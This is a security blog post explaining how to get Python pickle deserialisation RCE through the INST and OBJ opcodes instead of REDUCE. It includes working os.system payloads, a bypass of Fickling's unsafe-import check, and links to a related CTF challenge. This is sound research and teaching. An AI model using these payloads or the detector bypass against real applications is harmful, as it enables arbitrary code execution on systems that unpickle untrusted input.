Python Pickle RCE without __reduce__
Tags: #random
2022-12-23
“Every single pickle deserialisation payload uses __reduce__ … I wonder if it’s possible to get RCE without it”
And that’s how I nerdsniped myself and lost 5h of my life.
TL;DR
Yes, it’s possible, here are two functional payloads:
>>> inst_bomb
b'(S"whoami"\nios\nsystem\n.'
>>> pickletools.dis(inst_bomb)
0: ( MARK
1: S STRING 'whoami'
11: i INST 'os system' (MARK at 0)
22: . STOP
highest protocol among opcodes = 0
>>> pickle.loads(inst_bomb)
alol
>>> obj_bomb
b'(cos\nsystem\nS"whoami"\no.'
>>> pickletools.dis(obj_bomb)
0: ( MARK
1: c GLOBAL 'os system'
12: S STRING 'whoami'
22: o OBJ (MARK at 0)
23: . STOP
highest protocol among opcodes = 1
>>> pickle.loads(obj_bomb)
alol
Foreword
This blog post won’t explain:
- What (de)serialization is and the vulnerabilities that can arise from it; PortSwigger’s Web Security Academy has already done a great job at that.
- What the pickle module is; its inner workings have already been thoroughly explained in this great blog post and in pickletools’ documentation.
However, what it will detail is how the REDUCE primitive could have been found and how to find novel (to my knowledge) exploit primitives.
For some additional reading, here are links to the best research done on pickle deserialization.
- Dangerous pickles — malicious python serialization [blog]: Already linked above, the best article to date on pickle deserialization, very well explained.
- Never a dill moment: Exploiting machine learning pickle files [blog] [conf]: On the resurgence in the use of pickle for Machine Learning and its security implications.
- Pain Pickle: Systemically bypassing restricted unpickle [conf] [slides]: Great research (in Cantonese) on how to systematically bypass RestrictedUnpicklers to achieve RCE.
The REDUCE primitive
Before looking for new exploit paths it’s a good idea to first understand how the existing one works by diving into the source code.
NB: Pre-existing comments in the source code have been removed for the sake of clarity.
When a REDUCE opcode is read, the main fetch-decode-execute loop calls the corresponding function (load_reduce).
def load_reduce(self):
    stack = self.stack
    args = stack.pop()       # pop the args (tuple) off the top of the stack
    func = stack[-1]         # get the value now on top of the stack (function)
    stack[-1] = func(*args)  # call func with args -> RCE
    # arg1(*arg2) is a pattern that will come back later.
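To tie this back to the __reduce__ method from the title: when an object defines __reduce__, the pickler serializes the returned (callable, args) pair and emits a REDUCE opcode, which load_reduce then executes. Below is a minimal sketch of that round trip. The Demo class is hypothetical (it is not from the original research), and the harmless len stands in for a command runner so that nothing gets executed.

```python
import pickle
import pickletools


class Demo:
    """Hypothetical class used only for this illustration."""

    def __reduce__(self):
        # (callable, args): unpickling will call len("whoami").
        return (len, ("whoami",))


payload = pickle.dumps(Demo(), protocol=0)

# List the opcode names the pickler emitted for this object.
opcodes = [op.name for op, _arg, _pos in pickletools.genops(payload)]
print(opcodes)

# load_reduce calls len("whoami") and leaves the result on the stack.
result = pickle.loads(payload)
print(result)
```

The opcode list should contain REDUCE, which is why filters that only look for that opcode (or for __reduce__) catch the classic payloads.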
The load_reduce function requires a callable to have already been pushed onto the stack. There are a few ways of doing this, the easiest being to use either the GLOBAL or STACK_GLOBAL instructions. Both corresponding functions work in a very similar way: load_global reads the module/name values as newline-terminated strings from the pickle stream, whilst load_stack_global pops them off the stack.
def load_global(self):
    module = self.readline()[:-1].decode("utf-8")  # read module string
    name = self.readline()[:-1].decode("utf-8")    # read name string
    klass = self.find_class(module, name)          # call find_class
    self.append(klass)                             # append result to stack
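The difference between the two opcodes can be seen with two hand-written payloads. This is only a sketch: it resolves the harmless os.getcwd (my choice, not from the original post) and never calls it, since no REDUCE, INST or OBJ opcode follows.

```python
import os
import pickle

# GLOBAL ('c'): module and name are read from the stream as two lines.
via_global = pickle.loads(b"cos\ngetcwd\n.")

# STACK_GLOBAL (b'\x93'): module and name are first pushed as strings
# with STRING ('S'), then popped off the stack by the opcode.
via_stack_global = pickle.loads(b'S"os"\nS"getcwd"\n\x93.')

# Both payloads leave the very same function object on the stack.
print(via_global is os.getcwd, via_stack_global is os.getcwd)
```

Either way the lookup ends up in find_class, which is what makes that function worth a closer look.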
The call to find_class seems to be the important part of the function, so let’s investigate.
NB: Since the PROTO opcode (protocol version, 0 by default) is optional and has no real influence on the program flow, it has been omitted from the given payloads for the sake of brevity.
def find_class(self, module, name):
    sys.audit('pickle.find_class', module, name)
    if self.proto < 3 and self.fix_imports:
        pass  # fix the imports (Python 2 name remapping, elided here)
    __import__(module, level=0)  # import the module
    if self.proto >= 4:  # both branches do the same thing
        return _getattribute(sys.modules[module], name)[0]
    else:
        return getattr(sys.modules[module], name)  # return module.function
Being able to import specific modules and functions is an extremely useful primitive, thus the search for a REDUCE-less payload started by looking for functions calling find_class.
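Since every opcode that resolves a global goes through find_class, overriding it is a convenient way to watch what a payload asks for. The sketch below is an illustration, not a recommended defence: TracingUnpickler and trace are hypothetical names, and the classic REDUCE payload is included for comparison even though it is not shown in this post. Every lookup is refused, so nothing is ever called.

```python
import io
import pickle


class TracingUnpickler(pickle.Unpickler):
    """Hypothetical helper: record every find_class lookup, then refuse it."""

    def __init__(self, data):
        super().__init__(io.BytesIO(data))
        self.lookups = []

    def find_class(self, module, name):
        self.lookups.append((module, name))
        # Raising here stops the load before anything gets called.
        raise pickle.UnpicklingError(f"refused lookup of {module}.{name}")


def trace(data):
    """Return the (module, name) pairs a payload tried to resolve."""
    unpickler = TracingUnpickler(data)
    try:
        unpickler.load()
    except pickle.UnpicklingError:
        pass
    return unpickler.lookups


reduce_payload = b'cos\nsystem\n(S"whoami"\ntR.'  # classic REDUCE payload
inst_payload = b'(S"whoami"\nios\nsystem\n.'      # INST payload from the TL;DR
obj_payload = b'(cos\nsystem\nS"whoami"\no.'      # OBJ payload from the TL;DR

for payload in (reduce_payload, inst_payload, obj_payload):
    print(trace(payload))
```

All three payloads should report the same ('os', 'system') lookup, whichever opcode ends up doing the call.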
The INST primitive
The only other interesting function that calls find_class is the load_inst function.
def load_inst(self):
    module = self.readline()[:-1].decode("ascii")  # read module string
    name = self.readline()[:-1].decode("ascii")    # read name string
    klass = self.find_class(module, name)          # call find_class
    self._instantiate(klass, self.pop_mark())      # call _instantiate
The function ends with a call to _instantiate.
def _instantiate(self, klass, args):
    if (args or not isinstance(klass, type) or
        hasattr(klass, "__getinitargs__")):
        try:
            value = klass(*args)  # the arg1(*arg2) pattern reemerges
        except TypeError as err:
            raise TypeError("in constructor for %s: %s" %
                            (klass.__name__, str(err)), sys.exc_info()[2])
    else:
        value = klass.__new__(klass)
    self.append(value)
Just like load_reduce, _instantiate takes a callable (klass) and a sequence of arguments (args) as parameters and calls the callable with the unpacked arguments (klass(*args)), allowing for arbitrary code execution. Below is an annotated example payload:
>>> pickletools.dis(b'(S"whoami"\nios\nsystem\n.', annotate=1)
0: ( MARK Push markobject onto the stack.
1: S STRING 'whoami' Push a Python string object.
11: i INST 'os system' (MARK at 0) Build a class instance.
22: . STOP Stop the unpickling machine.
highest protocol among opcodes = 0
>>> pickle.loads(b'(S"whoami"\nios\nsystem\n.')
alol
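To poke at the INST primitive without running a command, the same layout can be replayed with harmless callables. This is a sketch under my own assumptions: builtins.len, os.getcwd and builtins.dict are stand-ins I picked, not payloads from the original research. It also exercises the branches of _instantiate shown above.

```python
import os
import pickle
import pickletools

# Same layout as the payload above, with builtins.len swapped in for os.system.
inst_len = b'(S"whoami"\nibuiltins\nlen\n.'

# No REDUCE opcode appears anywhere in the stream.
opcodes = [op.name for op, _arg, _pos in pickletools.genops(inst_len)]
print(opcodes)

# args is non-empty, so _instantiate calls len("whoami").
length = pickle.loads(inst_len)
print(length)

# No arguments, but os.getcwd is not a class: it is still called.
cwd = pickle.loads(b"(ios\ngetcwd\n.")
print(cwd == os.getcwd())

# No arguments and a real class: the instance comes from klass.__new__(klass).
empty = pickle.loads(b"(ibuiltins\ndict\n.")
print(empty)
```

The second case is worth remembering: a zero-argument function is still called, so an INST payload doesn't even need a STRING opcode.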
The OBJ primitive
The search for other functions calling _instantiate yielded only one other function: load_obj.
def load_obj(self):
    args = self.pop_mark()
    cls = args.pop(0)
    self._instantiate(cls, args)
It works in a very similar way to load_reduce: the function gets two variables, one containing a callable and the other containing a list of arguments, and calls the callable with the arguments. Below is an annotated example payload:
>>> pickletools.dis(b'(cos\nsystem\nS"whoami"\no.', annotate=1)
0: ( MARK Push markobject onto the stack.
1: c GLOBAL 'os system' Push a global object (module.attr) on the stack.
12: S STRING 'whoami' Push a Python string object.
22: o OBJ (MARK at 0) Build a class instance.
23: . STOP Stop the unpickling machine.
highest protocol among opcodes = 1
>>> pickle.loads(b'(cos\nsystem\nS"whoami"\no.')
alol
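Handcrafting these bytes gets tedious quickly, so here is a minimal sketch of a payload builder for the OBJ layout. build_obj_payload is a hypothetical helper of mine (not part of pickle or of the tools linked in this post), and it only handles a single plain string argument.

```python
import pickle


def build_obj_payload(module, name, arg):
    """Hypothetical helper: assemble MARK, GLOBAL, STRING, OBJ, STOP by hand.

    Only handles a single string argument without quotes, backslashes
    or newlines.
    """
    return (
        b"("                                                      # MARK
        + b"c" + module.encode() + b"\n" + name.encode() + b"\n"  # GLOBAL
        + b'S"' + arg.encode() + b'"\n'                           # STRING
        + b"o"                                                    # OBJ
        + b"."                                                    # STOP
    )


# Rebuilds the exact payload shown above, without running it.
print(build_obj_payload("os", "system", "whoami"))

# Harmless variant: load_obj pops [len, "whoami"] and calls len("whoami").
print(pickle.loads(build_obj_payload("builtins", "len", "whoami")))
```

The first element after the MARK becomes the callable and everything after it becomes its arguments, which is the whole trick.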
PS: Fickling won’t save pickling
Fickling is a Python pickle decompiler and static analyzer released by Trail of Bits. It aims to help reverse-engineer malicious pickle files, but it also offers the possibility to try and identify them with the --check-safety flag.
Disclaimer: Consistently identifying malicious code is, to put it lightly, pretty hard (and I’d be jobless if it wasn’t). Contrary to what the flag’s name suggests, Fickling isn’t meant for triaging pickle files and shouldn’t be used that way; it’s meant to reverse-engineer them.
As a pickle connoisseur and bypass enjoyer, I saw Fickling’s --check-safety flag and thought: “Oh! Now this looks interesting … I’m sure I can bypass it”. Turns out it wasn’t very hard :(
This is the function that checks for unsafe imports:
def unsafe_imports(self) -> Iterator[Union[ast.Import, ast.ImportFrom]]:
    for node in self.properties.imports:
        if node.module in ("__builtin__", "os", "subprocess", "sys",
                           "builtins", "socket"):
            yield node
    # [...]
It checks for the os module, which the payload uses, so why isn’t it being flagged? Here’s why:
$ fickling rce.pkl
from posix import system # `posix` on Linux/MacOS and `nt` on Windows
_var0 = system('whoami')
result = _var0
“On Unix, the os module provides a superset of the posix interface.” - docs.python.org
When the pickle was dumped, os was replaced with the OS-specific module!
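The substitution is easy to reproduce. A short sketch, assuming only the standard library; the exact module name depends on the platform, and the pickle is dumped but nothing is called:

```python
import os
import pickle

# os.system is defined in the platform module that os re-exports.
module_name = os.system.__module__
print(module_name)  # "posix" on Linux/macOS, "nt" on Windows

# The pickler records that name, so the GLOBAL line never mentions "os".
dumped = pickle.dumps(os.system, protocol=0)
print(dumped)
```

Any check that matches on the literal module name "os" therefore never sees it in a payload produced by pickle.dumps.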
Even though the “safety check” wasn’t meant to be Fickling’s flagship feature, they probably should have tested it on the most popular payload.
All in all, securing the pickle module is like trying to secure a pyjail: you don’t. You just delete the repo, burn the server and move on to something secure by design.
PPS: Irreductible
The premise of this blog post served as a challenge (Irreductible) for the HeroCTF v5 CTF. Since there was, to my knowledge, no documentation on the INST/OBJ techniques (except for this blog post, which was replaced with a rickroll for the duration of the CTF), I was hoping to give the players a hard time. Unbeknownst to me, there were quite a few write-ups on them; they were just all written in Mandarin ;(
I can’t complain though, I got free documentation out of it and still managed to make players suffer as only 7 teams solved the challenge, yay!
Additional documentation:
- https://goodapple.top/archives/1069: nice and detailed, even has a paragraph on bypassing the check for REDUCE
- https://xz.aliyun.com/t/7012: mentions INST/OBJ and links a Python to Pickle converter
- https://github.com/gousaiyang/pickleassem: a pickle bytecode assembler, could be used to craft the payload (instead of handcrafting it)
I finally get what our pwn guys mean when they say that learning Chinese is a viable CTF strategy.